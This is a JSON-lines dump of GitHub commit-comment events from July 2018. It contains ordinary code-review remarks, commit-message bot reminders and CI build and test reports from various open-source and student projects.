{"id":"7986127476","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"Demxr99/FBUInstagram"},"payload":{"comment":{"id":29757713,"position":6,"line":84,"path":"app/src/main/res/layout/item_post.xml","commit_id":"05f24656059a6b61dd0e0c86e1a685d5b9d43825","created_at":"2018-07-19T00:10:32Z","updated_at":"2018-07-19T00:10:32Z","author_association":"NONE","body":"You should only use \"+\" in android:id, otherwise the compiler won't be able to make sure you are referencing an existing component (which you want to be)."}},"created_at":"2018-07-19T00:10:32Z"}
{"id":"7986129616","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"Demxr99/FBUInstagram"},"payload":{"comment":{"id":29757718,"position":22,"line":126,"path":"app/src/main/res/layout/item_post.xml","commit_id":"05f24656059a6b61dd0e0c86e1a685d5b9d43825","created_at":"2018-07-19T00:11:15Z","updated_at":"2018-07-19T00:11:15Z","author_association":"NONE","body":"I am surprised the compiler/linter didn't bug you to put this string in a strings.xml file."}},"created_at":"2018-07-19T00:11:15Z"}
{"id":"7986130217","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29757720,"position":null,"line":null,"path":null,"commit_id":"bec0d7535eae2ca89baa5db4f6ea3cf0c200bc55","created_at":"2018-07-19T00:11:28Z","updated_at":"2018-07-19T00:11:28Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-19T00:11:28Z"}
{"id":"7986131274","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29757725,"position":null,"line":null,"path":null,"commit_id":"6a7f7242506aee31c1843b7db95f8a74e5a03ae4","created_at":"2018-07-19T00:11:49Z","updated_at":"2018-07-19T00:11:49Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-19T00:11:49Z"}
{"id":"7986137499","type":"CommitCommentEvent","actor":{"login":"jandubois"},"repo":{"name":"SUSE/scf"},"payload":{"comment":{"id":29757735,"position":6,"line":8,"path":"src/scf-release/jobs/acceptance-tests-brain/templates/environment.sh.erb","commit_id":"670a555c9613683243404ef4382f6059ead4de30","created_at":"2018-07-19T00:14:15Z","updated_at":"2018-07-19T00:14:15Z","author_association":"MEMBER","body":"If you do this, then you should also rename `CF_NAMESPACE` to `KUBERNETES_NAMESPACE` for consistency."}},"created_at":"2018-07-19T00:14:15Z"}
{"id":"7986140285","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"Demxr99/FBUInstagram"},"payload":{"comment":{"id":29757745,"position":18,"line":126,"path":"app/src/main/java/com/example/dedwards/fbu_instagram/fragment/ProfileFragment.java","commit_id":"3f46f0efd4eff43e8332b7284d72581261ec7634","created_at":"2018-07-19T00:15:21Z","updated_at":"2018-07-19T00:15:21Z","author_association":"NONE","body":"I tend to use String.valueOf(value_1), but that may be out-of-date, so Integer.toString(value_1) is prob fine."}},"created_at":"2018-07-19T00:15:21Z"}
{"id":"7986141946","type":"CommitCommentEvent","actor":{"login":"iandreff"},"repo":{"name":"iandreff/Test_repository"},"payload":{"comment":{"id":29757750,"position":5,"line":20,"path":"tabla.html","commit_id":"27c7ee61be234b9264147af0ab71fe93a5b70244","created_at":"2018-07-19T00:15:57Z","updated_at":"2018-07-19T00:15:57Z","author_association":"OWNER","body":"no estoy de acuerdo eliminar"}},"created_at":"2018-07-19T00:15:57Z"}
{"id":"7986142390","type":"CommitCommentEvent","actor":{"login":"txf2016"},"repo":{"name":"Cafory/Light_Control"},"payload":{"comment":{"id":29757754,"position":7,"line":37,"path":"Light_Control_Test/Light_Control_Test/MainWindow.xaml","commit_id":"c274bffe5dd8392a334b5de14e69e585cbac778f","created_at":"2018-07-19T00:16:08Z","updated_at":"2018-07-19T00:16:08Z","author_association":"CONTRIBUTOR","body":" < Ellipse  Height = “ 50 ”  Width = “ 50 ”  Fill = “ Bisque ” Canvas.Left = “ 177 ” Canvas.Top = “ 30 ” > </ Ellipse >"}},"created_at":"2018-07-19T00:16:08Z"}
{"id":"7986147929","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"Demxr99/FBUInstagram"},"payload":{"comment":{"id":29757769,"position":17,"line":41,"path":"app/src/main/java/com/example/dedwards/fbu_instagram/activity/DetailsActivity.java","commit_id":"dc1681ed0a8adef81d6fc708f926cf25b9860ddd","created_at":"2018-07-19T00:18:13Z","updated_at":"2018-07-19T00:18:13Z","author_association":"NONE","body":"My preference is for names like **ImageView imgComment** and  **TextView txtUsername** since \"View\" is kind of assumed, and that gives me a few more characters of context to work with."}},"created_at":"2018-07-19T00:18:13Z"}
{"id":"7986151609","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29757778,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-19T00:19:35Z","updated_at":"2018-07-19T00:19:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-19T00:19:35Z"}
{"id":"7986151801","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29757779,"position":null,"line":null,"path":null,"commit_id":"004c925f730c2b411df2d28666c8dcdc809f3adf","created_at":"2018-07-19T00:19:41Z","updated_at":"2018-07-19T00:19:41Z","author_association":"NONE","body":"What is the purpose of moving up `ili9341_init()`?"}},"created_at":"2018-07-19T00:19:41Z"}
{"id":"7986151921","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"Demxr99/FBUInstagram"},"payload":{"comment":{"id":29757780,"position":40,"line":61,"path":"app/src/main/java/com/example/dedwards/fbu_instagram/activity/ProfileActivity.java","commit_id":"dc1681ed0a8adef81d6fc708f926cf25b9860ddd","created_at":"2018-07-19T00:19:44Z","updated_at":"2018-07-19T00:19:44Z","author_association":"NONE","body":"Probably in java/Android it is more idiomatic to have variables **value1** and **value2** rather than **value_1** and **value_2**."}},"created_at":"2018-07-19T00:19:44Z"}
{"id":"7986154421","type":"CommitCommentEvent","actor":{"login":"nchieng"},"repo":{"name":"zendesk/volunteer_portal"},"payload":{"comment":{"id":29757787,"position":14,"line":55,"path":"app/models/event.rb","commit_id":"ddc14b76db997026d0669e9009dd7b608c2d0d1a","created_at":"2018-07-19T00:20:37Z","updated_at":"2018-07-19T00:20:37Z","author_association":"CONTRIBUTOR","body":"Can we add an error message to `ends_at` here?\r\n"}},"created_at":"2018-07-19T00:20:37Z"}
{"id":"7986154815","type":"CommitCommentEvent","actor":{"login":"romgrk"},"repo":{"name":"Place1/node-gir"},"payload":{"comment":{"id":29757790,"position":null,"line":null,"path":null,"commit_id":"cb274c940382f6dc1a38797ed06a8ae2e8c6b373","created_at":"2018-07-19T00:20:46Z","updated_at":"2018-07-19T00:20:46Z","author_association":"NONE","body":"Supported-ish, there's much more to do for the memory management.\r\nSuggested readings:\r\n - https://github.com/GNOME/gjs/blob/57d562d0cd4c4bae0748fbd5fc7ead9c64d41a8b/gi/function.cpp#L494\r\n - https://github.com/GNOME/gjs/blob/57d562d0cd4c4bae0748fbd5fc7ead9c64d41a8b/gi/function.cpp#L939"}},"created_at":"2018-07-19T00:20:46Z"}
{"id":"7986155292","type":"CommitCommentEvent","actor":{"login":"yanick"},"repo":{"name":"dluxhu/perl-parallel-forkmanager"},"payload":{"comment":{"id":29757793,"position":7,"line":811,"path":"lib/Parallel/ForkManager.pm","commit_id":"2b1c51d593b8c38f948b37ae6f07d26e33ef0da2","created_at":"2018-07-19T00:20:56Z","updated_at":"2018-07-19T00:20:56Z","author_association":"COLLABORATOR","body":"Nope, I think it needs to be there. :-)"}},"created_at":"2018-07-19T00:20:56Z"}
{"id":"7986155570","type":"CommitCommentEvent","actor":{"login":"yanick"},"repo":{"name":"dluxhu/perl-parallel-forkmanager"},"payload":{"comment":{"id":29757796,"position":4,"line":9,"path":"Changes","commit_id":"2b1c51d593b8c38f948b37ae6f07d26e33ef0da2","created_at":"2018-07-19T00:21:03Z","updated_at":"2018-07-19T00:21:03Z","author_association":"COLLABORATOR","body":"True!"}},"created_at":"2018-07-19T00:21:03Z"}
{"id":"7986156727","type":"CommitCommentEvent","actor":{"login":"gottesmm"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29757800,"position":28,"line":28,"path":"include/swift/SILOptimizer/Analysis/PassManagerVerifierAnalysis.h","commit_id":"4ba6a505639a5d9bcdd7bc1a4bdfb0c8131d6a67","created_at":"2018-07-19T00:21:29Z","updated_at":"2018-07-19T00:21:29Z","author_association":"MEMBER","body":"Thanks! I am going to do a follow up commit with some other fixes. Thanks!"}},"created_at":"2018-07-19T00:21:29Z"}
{"id":"7986156744","type":"CommitCommentEvent","actor":{"login":"leoybkim"},"repo":{"name":"Veleslavia/vimss"},"payload":{"comment":{"id":29757801,"position":null,"line":null,"path":null,"commit_id":"f43319737a520278c4f706c53c4a1cbf74de0e87","created_at":"2018-07-19T00:21:30Z","updated_at":"2018-07-19T00:21:30Z","author_association":"COLLABORATOR","body":":tada: "}},"created_at":"2018-07-19T00:21:30Z"}
{"id":"7986157068","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29757802,"position":null,"line":null,"path":null,"commit_id":"e58e9b6f72a8c6f98e1be0e808f170f2488ff929","created_at":"2018-07-19T00:21:37Z","updated_at":"2018-07-19T00:21:37Z","author_association":"COLLABORATOR","body":"@rama64 @carolina46 @Tino037 \r\nSi ahora usamos el @Transactional, tiene sentido entonces que usemos lo siguiente por ejemplo en HibernateUtil, no?\r\n\r\ntx = session.beginTransaction();\r\nsession.save(entity);\r\ntx.commit();"}},"created_at":"2018-07-19T00:21:37Z"}
{"id":"7986162000","type":"CommitCommentEvent","actor":{"login":"davidr123"},"repo":{"name":"davidr123/Proyecto-JavaScript"},"payload":{"comment":{"id":29757819,"position":null,"line":null,"path":null,"commit_id":"3affb47aced3e0ca01458ccd68e916d0058d92ba","created_at":"2018-07-19T00:23:26Z","updated_at":"2018-07-19T00:23:26Z","author_association":"OWNER","body":"finalcorrecion"}},"created_at":"2018-07-19T00:23:26Z"}
{"id":"7986178500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29757870,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-19T00:29:49Z","updated_at":"2018-07-19T00:29:49Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2321 of 2322 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-19T00:29:49Z"}
{"id":"7986182408","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29757884,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-19T00:31:17Z","updated_at":"2018-07-19T00:31:17Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T00:31:17Z"}
{"id":"7986186457","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29757890,"position":null,"line":null,"path":null,"commit_id":"d8cd5beea88010590dd1553dbcf113823d492f63","created_at":"2018-07-19T00:32:53Z","updated_at":"2018-07-19T00:32:53Z","author_association":"NONE","body":"I wonder if PSRAM in you committed message refers to 4MB SRAM outside of ESP32 chip over SPI? Do you have more hardware info? I checked the hardware reference on [ESP32-wrover](https://esp-idf.readthedocs.io/en/latest/hw-reference/modules-and-boards.html#esp32-wrover). But I got 404 error."}},"created_at":"2018-07-19T00:32:53Z"}
{"id":"7986187381","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29757891,"position":null,"line":null,"path":null,"commit_id":"c024298b7b51d76155a70fcff1dd74770c658d51","created_at":"2018-07-19T00:33:15Z","updated_at":"2018-07-19T00:33:15Z","author_association":"CONTRIBUTOR","body":"@bob0bob hey man, nice patch.\r\nbut in singleplayer my guards (from couple of GuardTower-3, not the BarracksTower) levels only to 4th level and don't request any armor and don't equip it also if i give them.\r\n\r\ni see AbstractEntityAIGuard.java:111 that LV=1 guard should request leather, am i right?"}},"created_at":"2018-07-19T00:33:15Z"}
{"id":"7986188795","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29757893,"position":null,"line":null,"path":null,"commit_id":"1d3f3a03a5c238d84317081a18a7a60c528af3ef","created_at":"2018-07-19T00:33:49Z","updated_at":"2018-07-19T00:33:49Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.232`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/232) :tada:"}},"created_at":"2018-07-19T00:33:49Z"}
{"id":"7986191173","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29757899,"position":null,"line":null,"path":null,"commit_id":"1d3f3a03a5c238d84317081a18a7a60c528af3ef","created_at":"2018-07-19T00:34:44Z","updated_at":"2018-07-19T00:34:44Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.351`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/405604281) :tada:"}},"created_at":"2018-07-19T00:34:44Z"}
{"id":"7986192201","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29757903,"position":null,"line":null,"path":null,"commit_id":"ec924b019dcd8950d66e86538b85d0cc98f516a8","created_at":"2018-07-19T00:35:09Z","updated_at":"2018-07-19T00:35:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement a dark/light theme toggle switch](https://trello.com/c/UB2Ucyh4/16-implement-a-dark-light-theme-toggle-switch)"}},"created_at":"2018-07-19T00:35:09Z"}
{"id":"7986193202","type":"CommitCommentEvent","actor":{"login":"carolina46"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29757905,"position":null,"line":null,"path":null,"commit_id":"e58e9b6f72a8c6f98e1be0e808f170f2488ff929","created_at":"2018-07-19T00:35:32Z","updated_at":"2018-07-19T00:35:32Z","author_association":"OWNER","body":"Si la idea es que nos olvidamos todo lo referido a las transacciones. Pero como no entiendo muy bien como funciona el @transactional por ahora dejo los dos hasta consultar a los ayudantes. "}},"created_at":"2018-07-19T00:35:32Z"}
{"id":"7986199340","type":"CommitCommentEvent","actor":{"login":"bob0bob"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29757916,"position":null,"line":null,"path":null,"commit_id":"c024298b7b51d76155a70fcff1dd74770c658d51","created_at":"2018-07-19T00:38:01Z","updated_at":"2018-07-19T00:38:01Z","author_association":"CONTRIBUTOR","body":"What level is the tower and guard.  It is a combination of the two?\r\nA level 4 tower and level 1 guard should request iron armor.\r\n\r\nlevel 3 tower and lv 1 guard = chainmail."}},"created_at":"2018-07-19T00:38:01Z"}
{"id":"7986203171","type":"CommitCommentEvent","actor":{"login":"Jeffchiucp"},"repo":{"name":"Broaden-io/Broaden-io-server"},"payload":{"comment":{"id":29757918,"position":39,"line":39,"path":"migrations/20180702040716-MoreChangesToRubricModel.js","commit_id":"a916ca278102690d75a2efec0cebdd59368a93b6","created_at":"2018-07-19T00:39:35Z","updated_at":"2018-07-19T00:39:35Z","author_association":"MEMBER","body":"i think we should remove the `;` at the end of this line\r\nI got a migration error, but it works when i remove  `;` at the end of this line:"}},"created_at":"2018-07-19T00:39:35Z"}
{"id":"7986203675","type":"CommitCommentEvent","actor":{"login":"Jeffchiucp"},"repo":{"name":"Broaden-io/Broaden-io-server"},"payload":{"comment":{"id":29757920,"position":null,"line":null,"path":null,"commit_id":"a916ca278102690d75a2efec0cebdd59368a93b6","created_at":"2018-07-19T00:39:49Z","updated_at":"2018-07-19T00:39:49Z","author_association":"MEMBER","body":"see my comment above."}},"created_at":"2018-07-19T00:39:49Z"}
{"id":"7986204399","type":"CommitCommentEvent","actor":{"login":"jedbrooke"},"repo":{"name":"Cythirixs/CLIPCO-Website"},"payload":{"comment":{"id":29757921,"position":null,"line":null,"path":null,"commit_id":"848d325f8c05277ffbde9778ad67ab38c3821440","created_at":"2018-07-19T00:40:04Z","updated_at":"2018-07-19T00:40:04Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Link in Donate FAQ 2nd Question is broken. What does the donation support?  Mandarin instructional materials, Mandarin library books, Mandarin homework club, Teacher’s Aides, technology, CLIP Art, student Mandarin assessment tests, and Mandarin curriculum development. Details can be found on the CLIPCO annual budget here.](https://trello.com/c/8gMj1mv5/11-link-in-donate-faq-2nd-question-is-broken-what-does-the-donation-support-mandarin-instructional-materials-mandarin-library-books)"}},"created_at":"2018-07-19T00:40:04Z"}
{"id":"7986209503","type":"CommitCommentEvent","actor":{"login":"Interkarma"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29757928,"position":null,"line":null,"path":null,"commit_id":"5b3ce1befee9d1811c8454020b36826a4ac802bc","created_at":"2018-07-19T00:42:09Z","updated_at":"2018-07-19T00:42:09Z","author_association":"OWNER","body":"For now, yeah. I might implement the non-fullscreen UI someday but have no interest in doing this before 1.0. I removed the red overlay as one of the translators complained it was overlaying their replacement artwork."}},"created_at":"2018-07-19T00:42:09Z"}
{"id":"7986209514","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29757929,"position":55,"line":80,"path":"app/src/main/java/me/carolwang/parstagram/PostAdapter.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T00:42:09Z","updated_at":"2018-07-19T00:42:09Z","author_association":"NONE","body":"Fancy!"}},"created_at":"2018-07-19T00:42:09Z"}
{"id":"7986209756","type":"CommitCommentEvent","actor":{"login":"kujyp"},"repo":{"name":"OrangeTen/TodayILearned"},"payload":{"comment":{"id":29757930,"position":null,"line":null,"path":null,"commit_id":"52699323c58fe723d5b7f9bc22a5c34b08a40f74","created_at":"2018-07-19T00:42:15Z","updated_at":"2018-07-19T00:42:15Z","author_association":"COLLABORATOR","body":"#87 "}},"created_at":"2018-07-19T00:42:15Z"}
{"id":"7986211788","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/javaWeb"},"payload":{"comment":{"id":29757935,"position":null,"line":null,"path":null,"commit_id":"61e74eb27b89e2087422f5849e56e3d9d6e086fb","created_at":"2018-07-19T00:43:01Z","updated_at":"2018-07-19T00:43:01Z","author_association":"OWNER","body":"ano... DL....?"}},"created_at":"2018-07-19T00:43:01Z"}
{"id":"7986213988","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29757937,"position":1,"line":1,"path":".settings/org.eclipse.core.resources.prefs","commit_id":"a248497b722c154eb0415c5cc438fcc929f5e6eb","created_at":"2018-07-19T00:43:48Z","updated_at":"2018-07-19T00:43:48Z","author_association":"CONTRIBUTOR","body":"What joke?"}},"created_at":"2018-07-19T00:43:48Z"}
{"id":"7986217325","type":"CommitCommentEvent","actor":{"login":"Alexstrowski"},"repo":{"name":"Alexstrowski/udemy-heroes"},"payload":{"comment":{"id":29757946,"position":null,"line":null,"path":null,"commit_id":"47a14294baee00529557567fcde4d54fb351f823","created_at":"2018-07-19T00:45:04Z","updated_at":"2018-07-19T00:45:04Z","author_association":"OWNER","body":"Perfecto, los cambios funcionaron 🍄 "}},"created_at":"2018-07-19T00:45:04Z"}
{"id":"7986217762","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29757948,"position":49,"line":74,"path":"app/src/main/java/me/carolwang/parstagram/PostAdapter.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T00:45:14Z","updated_at":"2018-07-19T00:45:14Z","author_association":"NONE","body":"You have the same code her for setting background and tint as you do in the onClickListener. Maybe a method like setLiked(holder, true/false) could reduce duplication."}},"created_at":"2018-07-19T00:45:14Z"}
{"id":"7986221081","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29757953,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-19T00:46:27Z","updated_at":"2018-07-19T00:46:27Z","author_association":"MEMBER","body":"reproducible for the werid screenshot?\r\n\r\nFor my phone sometimes stk will auto start a singlerace in lobby for unknown reason...."}},"created_at":"2018-07-19T00:46:27Z"}
{"id":"7986222682","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29757958,"position":95,"line":120,"path":"app/src/main/java/me/carolwang/parstagram/PostAdapter.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T00:47:06Z","updated_at":"2018-07-19T00:47:06Z","author_association":"NONE","body":"Same idea here: the main code in onBindViewHolder and here in the onClickListener should be shared/not duplicated."}},"created_at":"2018-07-19T00:47:06Z"}
{"id":"7986224517","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29757962,"position":120,"line":145,"path":"app/src/main/java/me/carolwang/parstagram/PostAdapter.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T00:47:45Z","updated_at":"2018-07-19T00:47:45Z","author_association":"NONE","body":"Do you really want to fall through here with a null bitmap?"}},"created_at":"2018-07-19T00:47:45Z"}
{"id":"7986225740","type":"CommitCommentEvent","actor":{"login":"mobe-mobe"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29757964,"position":135,"line":179,"path":"app/src/main/java/me/carolwang/parstagram/PostAdapter.java","commit_id":"3c1da00655ace96c60c9a9e1b624735ab1f92ab3","created_at":"2018-07-19T00:48:16Z","updated_at":"2018-07-19T00:48:16Z","author_association":"NONE","body":"Probably **btnLike** given the other property names."}},"created_at":"2018-07-19T00:48:16Z"}
{"id":"7986226609","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29757967,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T00:48:37Z","updated_at":"2018-07-19T00:48:37Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - Win64-Windows-7-VisualStudio-14: Tests Failed (2364 of 2930 tests passed, 57 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 562 tests had: Table big diffs.\n * 169 tests had: ESO small diffs.\n * 1 test had: BND diffs.\n * 81 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 101 tests had: MTR small diffs.\n * 40 tests had: MTR big diffs.\n * 23 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 57\n * Failed: 566\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.68%25-red.png)</a> \n"}},"created_at":"2018-07-19T00:48:37Z"}
{"id":"7986226758","type":"CommitCommentEvent","actor":{"login":"Faze18"},"repo":{"name":"Faze18/ProjectX"},"payload":{"comment":{"id":29757968,"position":null,"line":null,"path":null,"commit_id":"d1f3f3bce1c8ff9fad02c474e2842fb12de2e32e","created_at":"2018-07-19T00:48:41Z","updated_at":"2018-07-19T00:48:41Z","author_association":"OWNER","body":"Approved"}},"created_at":"2018-07-19T00:48:41Z"}
{"id":"7986230646","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29757973,"position":null,"line":null,"path":null,"commit_id":"21a052e5380dc190ffffc6acc8743e0ddefcfa83","created_at":"2018-07-19T00:50:11Z","updated_at":"2018-07-19T00:50:11Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-56](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-56).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-56-tre.pantheonsite.io/)"}},"created_at":"2018-07-19T00:50:11Z"}
{"id":"7986232143","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"Darcman99/Omnia-Contentus"},"payload":{"comment":{"id":29757975,"position":5,"line":38,"path":"data/planet.txt","commit_id":"636aa42aebdcf402e0fabf7235045cdc03db4f0c","created_at":"2018-07-19T00:50:45Z","updated_at":"2018-07-19T00:50:45Z","author_association":"NONE","body":"a generic name like that is not recommended"}},"created_at":"2018-07-19T00:50:45Z"}
